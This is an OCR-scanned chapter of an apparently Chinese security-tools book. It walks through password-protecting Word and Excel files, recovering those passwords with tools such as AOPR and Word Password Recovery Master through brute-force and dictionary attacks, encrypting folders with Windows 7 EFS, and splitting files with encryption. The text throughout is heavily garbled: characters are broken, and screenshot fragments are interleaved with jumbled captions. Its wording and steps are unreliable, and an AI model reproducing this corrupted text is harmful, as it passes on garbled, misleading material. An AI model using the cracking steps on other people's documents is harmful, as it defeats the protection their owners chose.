文件 密码 。 改 文件 密码 。 存 为 ”对 话 框 ， 单 击 “ 保 存 ” 按 
钮 , 即 可 保存 Word 文 档 。 
STEP07: 再次 打开 该 Word 文档 STEP08: 键入 修改 文件 所 需 的 帘 码 


”站 友 轩 风暴 一 一 畦 谊 与 民办 二 具 使 用 详解 》 ,doc" 
由 wuxinhua 保存 


请 健 信 修改 文件 所 秀 的 密码 ， 否 则 以 只 读 方 式 打开 
喜悦 人 D) : 高 斋 高 


在 “密码 ”对 话 框 中 输入 单 击 “ 确 图 输入 修改 文件 国 单 击 “ 确 定 ”按钮 ， 打 
打开 文件 时 的 密码 。 定 ”按钮 。 ”时 的 密码 。 开 已 加 密 的 Word 文 档 。 


3. 使 用 AOPR 解密 Word 文档 

AOPR (Advanced Office Password Recovery) 是 一 款 密 但 恢复 软件 ， 利 用 该 工具 可 以 
恢复 Microsoft Office 文档 的 密码 ， 它 还 文 持 非 瑞 文字 符 。 

使 用 AOPR 解密 Word 文档 的 具体 操作 步骤 如 下 。 


STEP01: 打开 AOPR 主 窗口 STEP02: 打开 文件 


由 | Advanced Office Password Recovery Professional Edition - 无 标 把 


文件 恢复 因特网 VBA 后 |] 语言 ”帮助 < 《 反 是 风景 旦 客 与 反 是 工具 使 用 洋 .，)》 新 建文 件 夫 


@ SS 瓜 航 ; er 


打开 文件 .。 ot quook 。 vBA 后 站 


恢复 | 暴力 | 字典 | 选 硕 | 系统 信息 || 密码 绥 存 
针对 强加 密 文档 的 破解 类 型 

合 暴力 破解 《尝试 所 有 可 能 的 组 合 ) 

辐 搞 码 式 暴力 破解 ( 若 已 获知 部 分 密码 符号 ) 

回 字典 破解 《推荐 ) 

文件 名 称 : 


日 志 窗口 


日 期 ， 时 间 事件 

二 2014/9/1 10:48:15 AOPR 5.03 Prbfessional Editon 已 加 载 

Gay 2014/9/1 10:48:15 此 操作 系统 版 本 : Windows 7 [6,1,7601] Service Pack 1 本 地磁 扯 

Cy 2014/9/1 10:48:15 CPU: 2, NVid CUDA: 0, ATI CAL: 0 | -局 攻 站 

当前 密码 ; 当前 速度 ; 文件 名 (N): 《 反 黑 风暴 一 一 黑客 与 反 黑 工具 使 用 详解 》.doc ~ ”| 所 有 支持 的 文件 类 型 M 
进度 指示 器 0% 
| 供 衣 庭 及 商业 用 户 的 授权 ( 单机 ) Lo | 
Advanced Office Password Recovery Prgfessional Edition, 版 本 5.03. Copynight ?1999-2010 ElcomSoft Co, Ltd - 
i 区 天 ~ = 和 = > i 入 mn 
单 击 “ 打 开 文件 ”按钮 。 选取 需要 解密 的 单 击 “ 打 开 ” 按 钮 。 
Word 文档 。 
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ST IF 一 一 


到 > 


具 全 攻略 


合 人 他 他 


STEP03: ”预备 破解 


上 Advanced Office Password Recovery Professional Edition - 无 标题 


文件 恢复 因特网 VBA 后 门 ”语言 帮助 


打开 文件 MS 通行 证 。 MS Outook “YBA 后 门 


开始 


信和 止 


恢复 “| 景 力 _ | 字典 _| 选项 | 系统 信息 | 密码 缓存 


针对 强加 密 文档 的 破解 类 型 
以 力 破解 《尝试 所 有 可 能 的 组 合 ) 
挤 码 式 暴 力 破解 ( 若 已 获知 部 分 密码 符号 ) 
加 字典 破解 《推荐 ) 


文件 名 称 : 


2. 正在 检查 密码 组 存 .… 
3. 默认 字典 破解 ， 


供 家 庭 及 商业 用 序 的 授权 ( 单机 ) 
Advanced Offic 


查看 破解 进度 。 


正在 执行 预备 破解 …… 
1. 正在 检查 已 找到 的 密码 … 


已 完成 ! 
已 完成 ! 


正在 运行 … 


AOPR 正在 崇 试 恢复 某 暂 时 无 法 被 找到 的 密码 ， 请 稍 候 ， 这 
将 持续 若干 分 钟 。 


停止 


Password Recovery Professional Edition, 版 本 5.03. Copyright ?1999-2010 ElcomSoft Co. Ltd 


DS 


STEP04: 解密 完成 


Word 密码 已 被 恢复 


Word 交 件 打开 密码 : 
Word 写 保 护 密码 : 
Word 文档 保护 密码 : 
Word VBA 密码 : 


文件 路 径 : 
E:V2014 计 题 竺 叶 选 题 申 报 \ 黑 客 \ 羽 尽 黑 有 


无 法 立即 恢复 此 文件 的 文件 打开 密码 。 如 需 收复 此 密码 您 必须 使 用 某 种 破解 方 | 
式 ， 按 下 [确定 ] 按钮 ， 选 择 您 所 需 的 选 职 ， 肌 按 下 [开始 ] 按钮 即 可 开始 恢复 。 


查看 解密 出 的 各 种 密码 。 


4. 使 用 Word Password Recovery Master 解密 Word 文档 


Word Password Recovery Master 是 


/hr 


友人 


专门 用 于 对 Word 文档 进行 解密 


件 中 ， 用 户 可 设置 不 同 解密 方式 ， 从 而 提高 解密 的 针对 性 ， 加 快 解密 速度 。 


曝光 其 具体 的 操作 步 
STEP01: 打开 软件 


WD Word Password Recovery Master 


Fle Help 


又 如 下 。 


Word document name 
园 0 ND 


Word document hp 
"Dpen” passwol 
Write” 


“Protectiorm” 


单 击 加 图标， 选择 需 
要 解密 的 Word 文 档 。 


STEP03: 正在 解密 


单 击 “Remove” 


按钮 。 


Status Decrvyptine document. Flease wait... 


STEP02: 查看 提示 信息 


Information 


To remove the “open” password the proaram 
should connect to the Rixler Software Server, 
find the decryption key and decrypt the 
document content. Tf You are not cormected to 
In order to find the decrvyption Key the proeram 
sends to the Rixler Software Server DIL7 a few 
bytes of the document header. Tf you have a 
Firewall, please allow the Internet connection 


FDor t show this window aa 


单 击 “OK” 按 钮 。 


STEP04: 成 功 解密 


JJord Password Recovery Master 


提示 正在 解密 中 。 
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单 击 “确定 ”按钮 。 


:的 工具 。 在 该 软 


密码 攻防 


STEP05: 返回 主 界 面 


3 Word Password Recovery Master 


File Help 
Word document Tame 


辐 | D:\Documents\trhsh (Fixed). bak. doc 


Word document passwords 
"Dpen” password: ‘noneY 
“Wri te” 《TOTLE > 


"Protection”™ 


Dpen document in Microsoft Word 单 击 此 链接 ， 即 可 打开 文档 并 查看 内 容 。 


10.1.5 EXCel 文件 加 客 解 客 工具 


Microsoft Office Excel 在 提供 加 密 文 档 的 同时 , 还 提供 保护 工作 表 、 保 护 工作 短 等 功能 ， 
用 户 可 以 使 用 这 些 功能 对 Excel 文档 进行 保护 ， 以 防止 别人 进行 颖 探 和 修改 。 

1. 使 用 “ 单 规 选项 ”进行 加 密 

Excel 中 的 “各 规 选 项 ”功能 与 Word 中 的 该 项 功能 相似 ， 都 是 对 Excel 文档 和 修改 文 
档 同 时 进行 加 密 。 其 体 的 操作 步骤 如 下 。 


STEP01: 打开 Excel STEP02: 打开 “信息 ”窗口 


保护 工作 簿 属性 ~ 
控制 其 他 人 可 以 对 此 工作 筹 所 做 的 更 改 类 型 ， 大 小 12.4KB 
标题 添加 标题 


C 


标记 添加 标记 
类 别 添加 类 别 


检查 工作 秒 1 


在 发 布 此 文件 之 前 ， 请 注意 其 包含 以 下 内 容 : 
自残 简 人 士 难 | 内 容 上 次 收 改 时 间 2014/2/17... 


保存 文件 时 ， 椅 自动 脐 除 尾 性 和 个 人 信息 的 设置 他 9 间 2006/9/16... 
允许 符 此 信息 保存 在 您 的 文件 中 上 次 打印 时 间 


相关 人 员 

作者 

上 次 修改 者 
相关 文档 

9 打开 文件 位 置 


版 本 


司 找 不 到 此 文件 的 上 一 个 版 本 。 


浏览 器 视图 选项 


和 在 Web 上 坦 看 此 工 作 敌 时 用 户 可 以 直到 的 内 7 


浏览 可 视 图 


打开 要 加 密 的 文件 。 国 单 击 “文件 " 按钮 。 单 击 “另存 为 ”选项 。 
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客 志 
-区 -工具 人 攻 了 


命 人 人 他 
STEP03: 打开“ 另存 为 ”对 话 杠 STEP04: 打开 “常规 选项 ”对 话 框 
GO 贞 < 本 地 感 盘 (E:) 2014 选 明 新 建文 件 夫 (2) ESE 牢 就 选项 加 和 > 
mm 新 建文 件 突 FE v ©® 
中 音乐 ~ 名称 修改 日 期 类 型 大 小 生成 各 份 区 人 忻 (B) 
am 没有 与 搜索 条件 匹配 的 项 。 文件 共享 


和 


IE FRREBO: I 
Sean ，,- = ,| | 修改 权限 二 | | 


保存 类 型 (T): [Ecel 工作 秒 (.xlsx ~ 回 建 i a 
作者 : sq 标记 : 添加 标记 议 只 该 惟 ) 
回 保存 绾 咯 图 


本 
人 


设置 保存 位 置 和 保 国 单 击 “ 工 具 ” 按钮 ， 在 ”分 别 在 “打开 权限 密码 " 文本 框 和 “修改 权限 密码 " 


存 名 称 。 下 拉 菜 单 中 选择 “常规 选 ”文本 框 中 输入 相应 的 密码 后 , 单 击 “ 确 定 ”按钮 。 
项 ”选项 。 

STEP05: 确认 密码 STEP06: ”确认 修改 权限 密码 

确认 密码 | | 


吾 新 横 入 密码 (R}: 


或 忘记 密码 ， 则 无 法 将 其 恢复 。 建 议 将 设 症 修改 权限 密 始 不 中安 全 功能 。 使 用 此 功能 ， 


9 此 廊 档 进行 诬 编 加 ,但 不 能 为 其 加 密 ,因而 演 
意 用 户 训 够 编辑 文件 并 删除 密码 。 


| wa || ms | 


输入 设置 的 密码 。 单 击 “ 确 定 ”按钮 。 图 输入 修改 权限 单 击 “ 确 定 ”按钮 即 可 为 
密码 。 选 定 的 Excel 文 档 加 密 。 


亦 码 及 上 


2. 使 用 强制 保护 功能 

Microsoft Office Excel 目 融 的 强制 保护 功能 ， 可 以 保护 Excel 文档 中 的 工作 表 、 工 作 笑 
不 被 修改 。 有 共 体 的 操作 步骤 如 下 。 
STEP01: 打开 Excel 主 窗口 STEP02: 打开 “保护 工作 表 ” 对 话 框 


- Microsoft Exc 


?3 国 - 口 x 


保护 工作 表 及 锁定 的 单元 格 内 容 (C) 
取消 工作 表 保 护 时 使 用 的 密码 (P): 


允许 此 工作 表 的 所 有 用 户 进行 (O): 


在 “审阅 ”选项 卡 中 单 击 “保护 工作 表 ” 按 钮 。 ” 辆 输入 密码 。 单 击 “ 确 定 ”按钮 。 
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-< 第 10 章 


STEPO3: 
确认 窗 码 


确认 密码 


或 忘记 套 码 ， 则 无 法 将 其 恢复 。 建 议 将 
作 敌 和 工作 表 和 名 称 的 列表 保存 在 安全 的 
' 密友 是 区 分 大 小 写 的 )。 


单 击 “确定 ”按钮 ， 即 


输入 设置 的 


密码 。 实现 对 工作 表 的 保护 。 
STEP05: 打开 “保护 结构 和 窗口 ”对 话 框 
保护 结构 和 窗口 [是 | 


保护 工作 簿 
结构 (8) 
| 窗口 (W) 


密 始 ( 吕 选 ){P): 


设置 密码 ， 单 击 “确定 ” 按 钮 ， 即 实现 对 工作 秒 的 
保护 。 


STEP07: 打开 “保护 共享 工作 簿 ”对 话 框 


保护 工作 簿 
以 跟踪 修订 方式 共享 (S) 
用 此 方法 可 以 共享 工作 短 ， 并 过 免疫 失修 订 记 录 。 
如 要 设置 客 码 ， 必 须 在 此 时 进行 ， 即 在 将 工作 短 共 享 之 前 进行 。 
密码 (可 选 }(P): 


太太 究 


3. Excel 文件 解密 


密码 攻防 


STEP04: 返回 主 窗口 


3 国 - 日 Xx 
登录 多 司 


时 保护 并 共享 工作 簿 
5 允许 用 户 编辑 区 域 


单 击 “保护 工作 簿 ”按钮 。 


STEP06: 返回 主 窗口 


i :EAI et [| ~ 
全 显示 折 有 批注 。 共享 了 人 
和 Ts 
工作 表 工作 簿 工作 篇 了 修订 


单 击 “ 保 护 并 共享 工作 筹 ”按钮 。 


设置 保护 密码 ， 单 击 “确定 ”按钮 ， 即 实现 对 共享 
工作 簿 的 保护 。 


“ 共 公 文件 密码 恢复 程序 ”是 一 亚 国 产 的 黎 码 恢复 软件 ， 它 可 以 恢复 Microsoft Office 应 用 
程序 加 密 的 文件 ， 如 Word、Excel 等 文档 的 密码 。 如 果 没 有 进行 注册 ， 则 只 能 破解 4 位 密码 。 
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Py > 
2 工具 全 攻略 


曝光 该 工具 恢复 Excel 文档 的 具体 操作 步骤 如 下 。 


STEP01: 打开 文件 主 窗口 STEP02: 成功 添 加 Excel 文件 


车 共 公 文件 富 玛 恢复 程序 2.0 版 
文件 区 ) 编辑 下 ) 运行 &) 帮助 0 


Le] [= -| 人 
多 入 Nm 
a La 


+ 办 公交 件 鲍 码 恢复 程 计 2-0 版 
文件 区 ) 编辑 区 ) 运行 区) 帮助 册 ) 


选择 以 下 合适 字符 作为 测试 密码 引 E 项 选择 影响 恢复 速度 及 有 卵 性) 


labcdefghijklrmopqrstuwvweya 区 012345678 厂 空格 厂 abchefghi 这 lmnopgrstuwmwxy 了 克 0123456789 厂 空格 
厂 BBCDEFGHIJTELMNOPARSTUYWEYZ 0 ee 厂 1 @#4% A*()-_=+\| 


厂 自 定义 |[ 在 此 输入 自 定义 字符 ， 可 以 是 六 字 | 


厂 ABCDEFGHIJELMNOPARSTUYWAYZ TI 1 (0)-_=+\| 


厂 自 牢 义 [在 此 输入 自 定义 字符 ， 可 以 是 汉字 ] 


恢复 密码 


密码 位 数 : 从 [1 x| 到 | x| 位 使 用 时 间 : 
密码 ，| 0 Eo | po os 


PEL) | +O 


名 各 未 注册 、 2010-5-8| [EE] 11:17 


密码 倍数 : 从 站 了 | 到 [5 -| 位 使 用 时 间 
密码 : | [aaa 人 


和 


2010-5-8 [EF] 11:18 


单 击 “ 打 开 ” 按 钮 总 ， 在 “打开 ”对 话 框 中 选择 ”查看 已 添加 的 Excel 文 件 。 
需要 破解 的 Excel 工 作 敌 ， 单 击 “ 打 开 ” 按 钮 。 


STEP03: 开始 恢复 STEP04: 密码 恢复 成 功 


务 苏 公 文件 富 码 恢复 程序 2.0 版 
文件 到 ) 编辑 于】 运行 双 ) 帮助 0) 


革 EE Ee I NR? @ 
Ferry per I 办 公交 件 密码 恢复 程序 
选择 以 下 合适 字符 作为 测试 密码 (此 项 选择 影响 恢复 速度 及 有 效 性 ) 


F abcdefehijklmoparstuwwayz 01239456789 厂 空格 交 件 密码 恢复 成 功 | 


厂 ABCDEFCHIJELJDOPQRSTUYWXYZ {=+\| 


厂 自 定义 [在 此 输入 自 定义 字符 ， 可 以 是 汉字 ] 


密码 位 数 ， 从 [i ~| 到 3 -| 位 
证 三 ， | [0 


设置 密码 组 合 的 字符 、 密 码 长 度 , 单 击 “开始 恢复 ” 如 果 找 到 密码 ， 则 可 看 到 “恢复 成 功 ” 对 话 框 ， 在 
按钮 ， 即 开始 破解 。 其 中 可 以 看 到 该 Excel 文 档 的 密码 。 


10:1.6 NIR 文件 系统 加 密 数 据 


Windows 7 提供 了 内 置 的 加 蜜 文件 系统 (Encrypting Files System，EFS)。EFS 不 仅 可 
以 阻止 入 侵 者 对 文件 或 文件 夹 对 象 的 访问 ， 而 且 保 持 了 操作 的 简洁 性 。 加 密 文 件 系 统 通过 
为 指定 NTFS 文件 与 文件 夹 加 密 数 据 ， 从 而 确保 用 户 在 本 地 计算 机 中 安全 存储 重要 数据 。 
由 于 EFS 与 文件 集成 ， 因 此 对 计算 机 中 重要 数据 的 安全 保护 十 分 有 益 

1. 加 密 操 作 

利用 Windows 7 资源 管理 器 选中 竺 设置 加 密 属 性 的 文件 或 文件 夹 《〈 如 文件 夹 为 “新 建 
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文件 夹 沁 。 对 访 文 件 进行 加 密 的 共 体 操作 步骤 如 下 。 


STEP01: 选择 要 加 密 的 文件 夹 STEPO2: 


由 难 ”添加 到 压缩 文件 (A)... 

难 ” 沃 加 到 "新 建文 件 去 .rar"(T) 

难 ”压缩 并 E-mail... 

|! 新建 难 ” 压 缩 到 "新 建文 件 去 .rar" 并 E-mail 


, 新 建议 国 ”上 传 到 百度 去 


上 新建 文件 去 属性 


常规 ”| 安全 ”| 以 前 的 版 本 


查看 新 建文 件 夹 属性 


新 建文 件 夹 


富 动 备份 到 昕 度 云 
十 和 3 Re 
十 第 5 吝 。 包 全 到 库 中 四 


睛 | 第 6 章 | 局 通过 QQ 发 送 到 我 的 手机 
昨 j| 第 7 章 


太 小 : 


包含 : 


大 Spybot - Search & Destroy 
发 送 到 (N) 


占用 空间 : 


创建 时 间 : 


交 件 来 
E:“ 列 选单 
0 字 节 
0 字 节 


0 个 文件 ，0 个 X 件 夹 


2013 年 11 月 19 日 ， 10:16:22 


募 切 人 m) 

复制 (C) 

创建 快捷 方式 (9) 
删除 (D) 

下 命 名 (MD) 


属性 : 


右 击 要 加 密 的 文件 来 ， 从 快捷 菜单 中 选择 “属性 ” 


心 人 
0D x o 


STEP03: 查看 高 级 属性 


从 在 “ 必 ”对话 杜 中 间 ° 


和 


存档 和 率 引 属性 


回 可 以 存档 文件 来 各) 

除了 文件 属性 外 ， 还 涡 计 索引 此 文件 来 中 文件 的 内 容 红 ) 
太 小 : 

压 腔 或 加 密 属性 

[| 压缩 内 容 以 便 节 省 磁盘 空 意 ) 


加 密 内 容 以 便 保 护 数 据 灾 ) 


包含 : 


| 详细 信息 @) | 


属性 : 


勾 选 “加 密 内 容 以 辆 单 击 “ 确 定 ”按钮 ， 完 
后 RE 复 选 框 。 成 文件 或 文件 夹 的 加 密 。 


STEPO4: 


占用 空间 : 


创建 时 间 : 


只 读 ( 疏 应 用 于 文件 夹 中 的 文件 ) ) 


单 击 “ 弟 规 ” 选 项 卡 中 的 “高 级 ”按钮 。 


返回 “新 建文 件 夹 属性 ”对 话 框 


新 建文 件 来 


六 件 来 
E:\ 列 选单 
0 字 节 
Ll ss 


0 个 文件 ; 0 个 文件 来 


2013 年 11 月 19 日 ，10:16:22 


只 读 ( 公 应 用 于 文件 来 中 的 文件 ) @) 
加 隐藏 


[| 应 用 ] 


单 击 “ 确 定 ” 按 钮 。 
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客 志 
PE 工具 人 攻 了 


信人 人 
STEP05: 确认 属性 更 改 STEP06: 查看 已 加 黎 的 文件 夹 


您 已 经 选择 对 属性 进行 以 下 更 改 ; 
加 密 | 工具 (T) 帮助 (H) 
电子 邮件 


是 要 埋 格 村 更 改 仅 应 用 于 此 文件 夫 ， 或 者 是 否 要 插 它 应 用 于 所 有 了 文 | 合 到 库 中 ~ 
各 更 林 井上 


加 避 将 更 改 应 用 于 此 文件 来 让 
回 将 更 改 应 用 于 此 文件 夹 、 子 文件 夹 和 文件 R | 


新 建 Microsoft 
Word 97 - 2003 
文档 (2).files 


2， 解密 操作 
利用 Windows 7 资源 管理 器 选中 已 设置 加 密 属性 的 文件 或 文件 夹 仍然 以 刚才 加 密 的 
文件 夹 为 例 )。 具 体 的 解密 操作 步骤 如 下 ， 


STEP01: 选择 已 加 密 的 文件 夹 STEP02: ”查看 新 建文 件 夹 属性 


中 v 电子 邮件 新 建文 人 丑 ”添加 到 压缩 文件 (A)... 
ee 激活 加 到 "新 建文 件 去 ,rar"() 
、 付 ” 压 六 并 E-mail... 常规 ”| 安全 “| 以 前 的 版 本 
疏 : 是 : 惟 ” 压 编 到 "新 建文 件 夫 .rar" 并 E-mail 
R || = 二 新 得 文件 天 
! 自动 备份 到 百度 云 
新 建 poi 和 Es 还 原 以 前 的 版 本 (W) 人 
Wi 转生 用 Nero 进行 刻录 位 而 : 3:\ 列 选 早 
包含 到 库 中 四 大 小 人 
通过 QQ 发 送 到 我 的 手机 占用 空间 : 0 字 节 
包含 : 0 个 文件 ，0 个 文件 来 


层 Spybot - Search & Destroy 


点 送 到 (N) 创建 时 间 : ”2013 年 11 月 19 日 ， 10:18:22 


逢 10 章 网 络 欺 
骗 与 安全 防范 ， 
doc 属性 : 只 诗 ( 想 应 用 于 文件 来 中 的 文件 ) R) 


est ks I 


删除 (D) 
重 命 名 (M) 


右 击 已 加 密 的 文件 夹 ， 选 择 “ 属 性 ”菜单 命令 。 单 击 “ 常 规 ”选项 卡 中 的 “高 级 ”按钮 。 
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STEP03: 查看 高 级 属性 


0 
Ee 
存档 和 索引 属性 


可 以 存档 文件 来 4) 
除了 文件 属性 外 ， 还 元 证 索引 此 文件 来 中 文件 的 内 容 妆 ) 


压迫 或 加 密 属 性 
[| 压缩 内 容 以 便 节 省 磁盘 空间 允 ) 


证 | 加 密 内 容 以 便 保 护 数据 宦 ) 


广 炙 信息 多) 


贺 取消 勾 选 “ 加 密 内 容 、 较 单 击 “ 确 定 ” 按 钮 。 
以 便 保 护 数据 ” 复 选 框 。 


STEP05: 打开 “确认 属性 更 改 " 对 话 框 


您 已 经 选择 对 属性 进行 以 下 更 改 : 
解密 


否 要 将 此 更 改 仅 应 用 于 此 文件 夹 ， 或 者 是 否 要 将 它 应 用 于 所 有 子 文 
得 如 莉 癌 拉 


四 保 将 更 砍 应 用 于 此 次 件 夹 
加 将 更 改 应 用 于 此 文件 来、 子 文 件 夹 和 文件 


国 选择 解密 应 用 范围 。 ” 较 单 击 “ 确 定 ” 按 钮 。 


二 第 10 章 


密码 攻防 


STEP04: 返回 “新 建文 件 夹 属性 ”对 话 框 


新 建文 件 夫 


文件 夹 
:到 | 选单 

大 小 。 0 字 节 

占用 空间 。 0 字 节 


包含 : 0 个 文件 ，0 个 文件 夹 


创建 时 间 : 2013 年 11 月 19 日 ，10:16:22 


属性 : 号 读 ( 哥 应 用 于 妈 件 来 中 的 净 件 ] 全) 
加 隐藏 m 


单 击 “ 确 定 ” 按 钮 。 


STEP06: 查看 已 解密 的 文件 夹 


本 地 磁盘 (E:) ， 新 建文 件 去 ， 计算 机 类 ， 黑客 攻防 实战 从 信 门 有 


工具 (T) 帮助 (H) 
会 到 库 中 Y 电子 邮件 


可 
| 
冯 

新 建 Microsoft 


Word 97 - 2003 
放 档 (2).files 


新 建立 件 替 


第 1 齐 从 地 开 始 
认识 时 宕 ,doc 


已 解密 的 文件 夹 字体 重新 变 回 黑色 。 


当然 ， 在 进行 加 密 / 解 密 操 作 时 也 应 注意 如 下 几 点 要 求 。 


1) 不 能 加 冤 或 解密 FAT 文件 系统 中 的 文件 与 文件 夹 ， 而 只 


区 上 进行 此 操作 。 


2) 数据 只 有 存储 在 本 地 磁盘 中 才 会 被 加 密 ， 


能 在 NTFS 格式 的 磁盘 分 


而 当 其 在 网 络 上 传输 时 则 不 会 加 密 


3) 已 丝 加 密 文 件 与 普通 文件 相同 ， 也 可 以 进行 复制 、 移 动 以 及 重 命 ;名 等 操作 ， 但 是 其 


操作 方式 可 能 会 影响 加 密 文 件 的 加 密 状 态 。 
3. 复制 加 密 文件 


在 Windows 7 资 


看 出 ， 复 制 加 密 文件 同 复制 普通 文件 并 没有 人 不同。 只 是 进行 复制 的 操作 者 必须 


源 过 理 喜 中 选中 竺 复制 的 加 密 文 件 ， 右 击 该 加 密 文件 并 从 快捷 染 单 中 
选择 “复制 ”命令 。 切 换 到 目标 位 置 并 右 击 ， 从 快捷 六 单 中 选择 “粘贴 ”命令 即 可 。 


可 以 


是 被 授权 的 


203 


So > 
2 工具 全 攻略 
全 人 人 他 
用 户 。 男 外 ， 加 密 文 件 的 副本 文件 也 是 被 加 密 的 。 

4， 移 动 加 密 文件 

在 Windows 7 资源 管理 器 中 选中 待 移动 的 加 密 文件 ， 右 击 该 加 密 文件 并 从 快捷 菜单 中 
选择 “前 切 ”命令 ， 再 切换 到 加 密 文件 的 目标 位 置 并 右 击 ， 从 快捷 菜单 中 选择 “粘贴 ” 命 
令 即 可 。 


机 对 加 密 文件 进行 复制 或 移动 时 ， 如 果 复 制 或 移动 到 FAT 文件 系统 中 ， 文 件 将 


注意 自动 解密 ， 所 以 在 对 加 密 文 件 进行 复制 或 移动 后 应 重新 进行 加 密 。 


10.2 文件 和 文件 夹 加 密 解 密 工 具 


文件 和 文件 夹 是 计算 机 磁盘 空间 为 了 分 类 存储 电子 文件 而 建立 独立 路 径 的 目录 ， 文 件 
夹 ” 束 是 一 个 目录 名 称 。 文 件 来 不 但 可 以 包含 文件 ， 而 且 可 包含 下 一 级 文件 灯 。 为 了 你 护 
文件 夹 的 安全 ， 还 需要 给 文件 或 文件 夹 进行 加 密 。 


10;2.1 文件 分 割 加 客 工 具 


为 保护 文件 的 安全 ， 可 以 将 其 分 割 成 儿 个 文件 ， 并 在 分 割 的 过 程 中 进行 加 蜜 ， 这 样 黑 
客 和 面临 分 割 后 的 文件 就 束 手 无 货 了 。 在 本 方 将 介绍 两 丈 弟 见 的 文件 分 割 加 密 工 其 。 

1. Fast File Splitter 

Fast File Splitter 可 把 大 文件 快速 分 割 成 小 部 分 ， 以 便于 携 市 或 用 E-mail 友 送 。 它 文 持 目 定 
义 分 割 文件 的 大 小 和 数量 ， 文 持 创建 目 解压 格式 的 分 割 文 件 包 ， 文 持 数 据 包 的 加 密 功能 。 使 用 
Fast File Splitter 软件 分 审 和 合并 文件 的 具体 操作 步骤 如 下 。 


STEP01: 运行 Fast File Splitter 软件 STEP02: 切换 至 “Options” 选 项 卡 


(BB Fast File Splitter (=) BB Fast File Splitter 


Split |Join |Options Split |Join | Options 


Source and Destination Files General Dptlions 


OO ES Delete original file after split 上 
Destinati on 加 Delete all split files after merge h 


Destination base [FNMaintain original file ex: Dptimization Dptions 
Hote: Dor' t chanee this value if you don + lmow what 


Splittine Style 
. . Removable 
Py Size (By Files Numb media quick 


Files size: 1350 加 卫 同上 1.44 MB Flopps = Buffer Size SOD Average Disk Transfer 25 NE/Second 


Splittine Options PO | 让 


Create a self extracting SFX Options Encryption Dptions 


Encrypt? Use Blowfish encryption (SIOW - but hard ti 


回 Disable cre file checks (speeds up the splittine and j 


|Compress (SLOW - but produces smaller fil Use a simple encryption (FAST - but easier 


REGISTER HERE 


打开 “Fast File Splitter” 主 界面 。 分 别 对 常规 选项 、 优 化 选项 、 加 密 选项 等 属性 进行 
设置 。 


200 


STEP03: 切换 至 “Split” 选项 卡 
唤 Fast File Splitter 


Split lai | options | 


Source file: 


黑 工 且 司 用 详解 3 tonperd0. rar 
人 


S_tonper40 


Destination 


Destinatlion base FMaintain original file ex: 
splittine Stvyle 
By Size By Files Humb 


Files| size: 1350 人 后) 王 


Removable 
media quick 


1.44 MB Flopp; ™ 
SFX Dptions 


Splitltine Options 
Fcrdate a self extractine 


Encryptior. 


设置 来 源 文件 、 较 勾 选 Encrypt 复 选 框 , 在 文 
目标 文件 夹 、 目 标 ”本 框 中 输入 相应 的 密码 ， 然 后 
基准 和 分 割 类 型 。 单 击 “Split” 按 钮 。 
STEP05: 查看 分 割 后 的 文件 


= 


名品 +| « 《 反 是 风景 一 时 者 与 反 .。 》 新 建文 件 夫 v | 4 好 | 起 寺 新 营 这 任 夫 
文件 (月 ”编辑 (E] ”前 看 (V) 工具 (T) ”帮助 (H) 
组 织 ” 包 合 到 库 中 v ”新 建文 件 夫 下 v 团 © 


固 国 
| 
于 
由 


S_tonper40.000 


S_tonper40.001 


司 | 迅雷 下 载 


NN ==rr 


| 


打开 设置 的 目标 文件 夹 ,在 其 中 可 看 到 分 割 后 的 文件 。 


2 个 对 象 


STEP07: 切换 至 “Join” 选 项 卡 


中 Fast File Splitter 


Merge Files 


Source file: 


办 办 新 建交 件 夹 \S_tonper40. 000 
EEC 


Destination 


File informati gn 


设置 来 源 文件 和 目标 
文件 奖 。 


单 击 “Join" 按钮 。 


STEP04: 成功 分 害 


SUCCEeSS 


splitting complete. 


单 击 “确定 ”按钮 。 


STEP06: 


(B®, Fast File Splitter 


Source and Destination Files 


里 工 且 使 用 详解 的 \tonperd0.rar 
反 黑 工具 使 用 详解 \ 新 建文 件 夫 


5S_tonperd0 


返回 “Split” 选项 卡 


Source file: 


Destination 


Destination base FNMaintain original file ex 
Splittine Style 


- Removable 
(© By Files Numb 


media quick 


1.44 MB Flopp; ™ 
SEX Dptions 


By Size 
Files 引 

Splittine Optipns 

站 Create a sel extractine 
VEncrypt? Encryption 


[Compress (SLDW - but produces smaller fil 


REGISTER WHERE 


在 “Splitting style” 栏目 中 选 单 击 “Split” 
择 “By Flies Numb” 单 选 按钮 ， 按钮 ， 可 按 文件 
在 “Flies” 文本 框 中 输入 每 个 分 ”的 数量 进行 分 割 。 
割 文件 包含 的 文件 数目 。 

STEP08: 输入 密码 


Enter Encryption Password 


Encryption password: 


输入 设置 的 加 密 密 码 ， 单 击 “OK” 按 钮 ， 即 可 合并 
已 分 割 的 文件 。 
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关 窜 RZ Th 
全 人 人 他 


STEP09: 合并 完成 


Meree Files 


Source file: 办 办 \ 新 建交 件 夹 *S_tonper40. 000 
Destinati on ' 友 黑 工 具 合 用 详解 “新 建文 件 到 [Choose 


File 1TEormat1lom 


Base filename: 
Dutput filename: 
Total slze: 
Ercryptedy? 
Compressed? 
check? 


在 “Success” 对 话 框 中 单 击 “确定 ”按钮 。 


2. Chop 

Chop 分 割 工 具 使 用 普通 窗口 或 回 导 界面 ， 能 够 按照 用 户 想 要 的 文件 数量 、 最 大 文件 大 小 分 割 
文件 。 也 可 以 使 用 预 设 的 用 于 电子 邮件 、 软 盘 、Zip 盘 、CD 等 的 通用 大 小 分 割 文件 。Chop 能 以 向 
导 或 普通 界面 劈 分 和 合并 文件 ， 并 文 持 保 留 文件 时 间 和 属性 、CRC、 命 令 行 操作 其 至 简单 加 密 

使 用 Chop 分 审 和 合并 文件 的 具体 操作 步骤 如 下 。 
STEP01: 运行 Chop.exe STEP02: ”加密 文件 


局 Chop | = 亏 Chop | es 
要 对 分 /合并 的 文件 HH 
未 选中 文件 
无 文件 字 节 
描述 
合用 


加 密 
| 加密 


输出 格式 


电邮 -| 数量 2 2 装 坦 ' |s 900 


38, 348, 556 字 节 


二 | 大 小 899 ES kB 


合并 方式 chop 


输出 目标 位 置 


同名 文件 来 
| C'\Users\Administrator\Desktop 


CRC 
回 使 用 CRC | 检查 CRC | 0 


打开 “Chop” 对 话 框 。 团 选 择 要 “加 国 设置 榆 多 -mm ' 开 
劈 分 /合并 密 " 复 选 框 并 出 的 目标 始 劈 分 ” 按 
的 文件 。 设置 加 密 密 位 置 。 钮 。 
码 。 
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STEP03: ”分割 宛 
Chop 1.51 


单 击 “ 继 续 ” 按 钮 ， 即 可 返回 主 界面 。 


STEPOS: 


要 劈 分 /合并 的 文件 
未 选中 文件 

无 文件 

摘 壕 

-| 使 用 

